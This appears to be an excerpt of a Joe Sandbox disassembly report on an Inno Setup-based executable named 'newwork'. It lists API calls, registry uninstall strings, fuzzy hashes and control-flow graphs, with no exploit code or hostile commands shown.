                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID: unins$unins???.*
                                                                                • API String ID: 3541575487-1009660736
                                                                                • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileFindFirstLast
                                                                                • String ID:
                                                                                • API String ID: 873889042-0
                                                                                • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstanceVersion
                                                                                • String ID:
                                                                                • API String ID: 1462612201-0
                                                                                • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 927 46f326-46f331 call 478e04 919->927 920->927 934 46f333-46f338 927->934 935 46f33a 927->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1037 46f659-46f65d 1033->1037 1037->1020 1037->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                                                APIs
                                                                                  • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                  • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close
                                                                                • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                • API String ID: 3391052094-3342197833
                                                                                • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1424 483a7c-483aa1 GetModuleHandleA GetProcAddress 1425 483b08-483b0d GetSystemInfo 1424->1425 1426 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1424->1426 1427 483b12-483b1b 1425->1427 1426->1427 1428 483abb-483ac6 GetCurrentProcess 1426->1428 1429 483b2b-483b32 1427->1429 1430 483b1d-483b21 1427->1430 1428->1427 1437 483ac8-483acc 1428->1437 1433 483b4d-483b52 1429->1433 1431 483b23-483b27 1430->1431 1432 483b34-483b3b 1430->1432 1435 483b29-483b46 1431->1435 1436 483b3d-483b44 1431->1436 1432->1433 1435->1433 1436->1433 1437->1427 1438 483ace-483ad5 call 45271c 1437->1438 1438->1427 1442 483ad7-483ae4 GetProcAddress 1438->1442 1442->1427 1443 483ae6-483afd GetModuleHandleA GetProcAddress 1442->1443 1443->1427 1444 483aff-483b06 1443->1444 1444->1427
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                • API String ID: 2230631259-2623177817
                                                                                • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1450 468d88-468dc0 call 47c26c 1453 468dc6-468dd6 call 478e24 1450->1453 1454 468fa2-468fbc call 403420 1450->1454 1459 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1453->1459 1465 468e25-468e27 1459->1465 1466 468e2d-468e42 1465->1466 1467 468f98-468f9c 1465->1467 1468 468e57-468e5e 1466->1468 1469 468e44-468e52 call 42dd4c 1466->1469 1467->1454 1467->1459 1471 468e60-468e82 call 42dd4c call 42dd64 1468->1471 1472 468e8b-468e92 1468->1472 1469->1468 1471->1472 1493 468e84 1471->1493 1473 468e94-468eb9 call 42dd4c * 2 1472->1473 1474 468eeb-468ef2 1472->1474 1496 468ebb-468ec4 call 4314f8 1473->1496 1497 468ec9-468edb call 42dd4c 1473->1497 1478 468ef4-468f06 call 42dd4c 1474->1478 1479 468f38-468f3f 1474->1479 1489 468f16-468f28 call 42dd4c 1478->1489 1490 468f08-468f11 call 4314f8 1478->1490 1481 468f41-468f75 call 42dd4c * 3 1479->1481 1482 468f7a-468f90 RegCloseKey 1479->1482 1481->1482 1489->1479 1503 468f2a-468f33 call 4314f8 1489->1503 1490->1489 1493->1472 1496->1497 1497->1474 1507 468edd-468ee6 call 4314f8 1497->1507 1503->1479 1507->1474
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                Strings
                                                                                • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                • Inno Setup: App Path, xrefs: 00468E4A
                                                                                • Inno Setup: No Icons, xrefs: 00468E73
                                                                                • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                • %s\%s_is1, xrefs: 00468E05
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1093091907
                                                                                • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                  • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                  • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                  • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                • API String ID: 3771764029-544719455
                                                                                • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1752 423874-42387e 1753 4239a7-4239ab 1752->1753 1754 423884-4238a6 call 41f3c4 GetClassInfoA 1752->1754 1757 4238d7-4238e0 GetSystemMetrics 1754->1757 1758 4238a8-4238bf RegisterClassA 1754->1758 1759 4238e2 1757->1759 1760 4238e5-4238ef GetSystemMetrics 1757->1760 1758->1757 1761 4238c1-4238d2 call 408cbc call 40311c 1758->1761 1759->1760 1762 4238f1 1760->1762 1763 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1760->1763 1761->1757 1762->1763 1775 423952-423965 call 424178 SendMessageA 1763->1775 1776 42396a-423998 GetSystemMenu DeleteMenu * 2 1763->1776 1775->1776 1776->1753 1777 42399a-4239a2 DeleteMenu 1776->1777 1777->1753
                                                                                APIs
                                                                                  • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
